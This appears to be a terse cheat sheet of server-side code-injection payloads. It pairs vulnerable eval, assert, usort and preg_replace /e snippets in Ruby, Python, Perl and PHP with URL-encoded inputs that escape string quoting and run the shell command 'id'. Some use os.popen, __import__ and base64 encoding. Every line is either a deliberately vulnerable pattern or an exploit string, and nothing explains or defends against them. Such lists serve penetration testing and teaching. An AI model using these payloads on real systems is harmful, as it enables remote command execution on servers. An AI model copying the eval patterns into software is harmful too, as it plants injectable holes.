eval "\""+params['1']+"\""
?1="%2b`id`%2b"
eval('"'+1+'"')
"%2bos.system('id')%2b"
"%2bos.popen('id').read()%2b"
"%2b__import__('os').popen('id').read()%2b"
"%2b__import__('os').popen(__import__('base64').b64decode('aWQ=')).read()%2b"
eval("return '".$FORM{1}."'");
/cgi-bin/form?1='.`id`.'
$s="echo \"".$_GET['1']."\";";
eval($s);
?1=".system('id')."
$1 = $_GET["1"];
usort(function('$a, $b', 'return strcmp($a->'.$1.',$b->'.$1.');'));
?1=id);}system('id');//
preg_replace($_GET["1"], $_GET["2"], $_GET["3"]);
?1=/x/e&2=system('id')&3=x
assert(trim("'".$_GET['1']."'"));
echo htmlentities($_GET['1']);
?1=hacker'.system('id').'